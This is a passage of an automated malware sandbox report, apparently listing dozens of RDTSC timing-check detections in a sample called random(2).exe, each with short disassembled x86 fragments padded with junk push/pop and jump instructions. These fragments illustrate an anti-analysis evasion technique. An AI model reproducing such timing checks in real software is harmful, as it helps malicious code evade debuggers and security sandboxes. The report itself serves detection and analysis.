                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F079 second address: 81F083 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F083 second address: 81F0A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8314EA9197h 0x00000008 jmp 00007F8314EA9191h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8226F0 second address: 822703 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40CAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82BFC9 second address: 82BFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA9191h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82B4F4 second address: 82B4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAC0 second address: 82AACA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AACA second address: 82AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAD2 second address: 82AAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAD6 second address: 82AAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82AAE3 second address: 82AAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDC5 second address: 82EDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDC9 second address: 82EDD3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8314EA9186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDD3 second address: 82EDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F83146B40CEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82EDE7 second address: 82EDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E678 second address: 82E67C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E67C second address: 82E6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F8314EA9192h 0x0000000f jl 00007F8314EA9186h 0x00000015 pop ebx 0x00000016 jnc 00007F8314EA9192h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E6B1 second address: 82E6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 82E823 second address: 82E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9190h 0x00000009 jg 00007F8314EA9186h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8312F7 second address: 831312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F83146B40C6h 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pushad 0x0000000d ja 00007F83146B40C8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837090 second address: 837094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837094 second address: 83709E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837229 second address: 83722D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83722D second address: 83724F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F83146B40CEh 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F83146B40C6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83724F second address: 837255 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837255 second address: 837269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F83146B40D2h 0x0000000c jno 00007F83146B40C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837269 second address: 837281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8314EA9191h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837281 second address: 837290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837290 second address: 837294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83739E second address: 8373C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F83146B40D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837672 second address: 83767E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F8314EA9186h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83767E second address: 83768B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83768B second address: 8376B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e ja 00007F8314EA9186h 0x00000014 pop edi 0x00000015 jmp 00007F8314EA9191h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376B5 second address: 8376B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376B9 second address: 8376C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8376C5 second address: 8376CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE66F second address: 7EE673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE673 second address: 7EE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE679 second address: 7EE67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EE67F second address: 7EE6A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F83146B40CBh 0x00000010 and dl, FFFFFF80h 0x00000013 pop edi 0x00000014 push 00000004h 0x00000016 mov dword ptr [ebp+122D1C14h], edx 0x0000001c push eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837A7C second address: 837A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8314EA9198h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837A9C second address: 837AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837AA0 second address: 837AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 837AA4 second address: 837AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F83146B40D7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83ADF6 second address: 83ADFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83ADFA second address: 83AE0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F83146B40CCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E69A second address: 83E69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E69E second address: 83E6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E812 second address: 83E83B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F8314EA91A1h 0x00000012 jmp 00007F8314EA9195h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E83B second address: 83E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E842 second address: 83E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83E994 second address: 83E9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40D5h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB10 second address: 83EB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB1F second address: 83EB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 83EB23 second address: 83EB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8314EA9198h 0x00000010 push eax 0x00000011 jp 00007F8314EA9186h 0x00000017 pop eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844F97 second address: 844F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844F9F second address: 844FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FAA second address: 844FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FB0 second address: 844FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FBF second address: 844FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F83146B40C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F83146B40CBh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 844FD9 second address: 844FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8454E6 second address: 845505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F83146B40D5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D28 second address: 845D64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8314EA9186h 0x00000008 jc 00007F8314EA9186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F8314EA9199h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jmp 00007F8314EA918Ch 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D64 second address: 845D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 845D6C second address: 845D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AE8 second address: 849AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AF1 second address: 849AFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849AFA second address: 849B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F83146B40DFh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C73 second address: 849C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C7D second address: 849C8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007F83146B40C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849C8E second address: 849CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8314EA9186h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F8314EA918Dh 0x00000015 popad 0x00000016 popad 0x00000017 push edi 0x00000018 pushad 0x00000019 jns 00007F8314EA9186h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 849F63 second address: 849F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F83146B40C6h 0x0000000a jmp 00007F83146B40D2h 0x0000000f popad 0x00000010 push ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A109 second address: 84A15C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8314EA9186h 0x00000008 jmp 00007F8314EA9195h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F8314EA919Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8314EA9197h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A2C9 second address: 84A2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83146B40D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A2E6 second address: 84A323 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F8314EA9186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F8314EA9199h 0x00000012 jmp 00007F8314EA918Eh 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A4B3 second address: 84A4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 84A4C3 second address: 84A4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F8314EA9186h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854A9D second address: 854AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854AA1 second address: 854AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854E8E second address: 854EC0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F83146B40C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F83146B40D2h 0x00000012 pushad 0x00000013 jmp 00007F83146B40D1h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EC0 second address: 854EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9198h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EE3 second address: 854EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 854EE7 second address: 854EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8551BE second address: 8551C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85541A second address: 85543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9193h 0x00000009 popad 0x0000000a js 00007F8314EA918Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85543A second address: 85543E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 85543E second address: 855443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 855E7D second address: 855E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 85660D second address: 856619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F8314EA9186h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 856619 second address: 856624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 856624 second address: 856647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8314EA9199h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 856647 second address: 85666C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F83146B40D0h 0x00000010 jl 00007F83146B40C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 85F415 second address: 85F41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 85F41C second address: 85F422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86C0CE second address: 86C0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86C0D2 second address: 86C0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 86C0E7 second address: 86C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9192h 0x00000007 je 00007F8314EA918Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8314EA918Fh 0x0000001c jmp 00007F8314EA918Fh 0x00000021 rdtsc
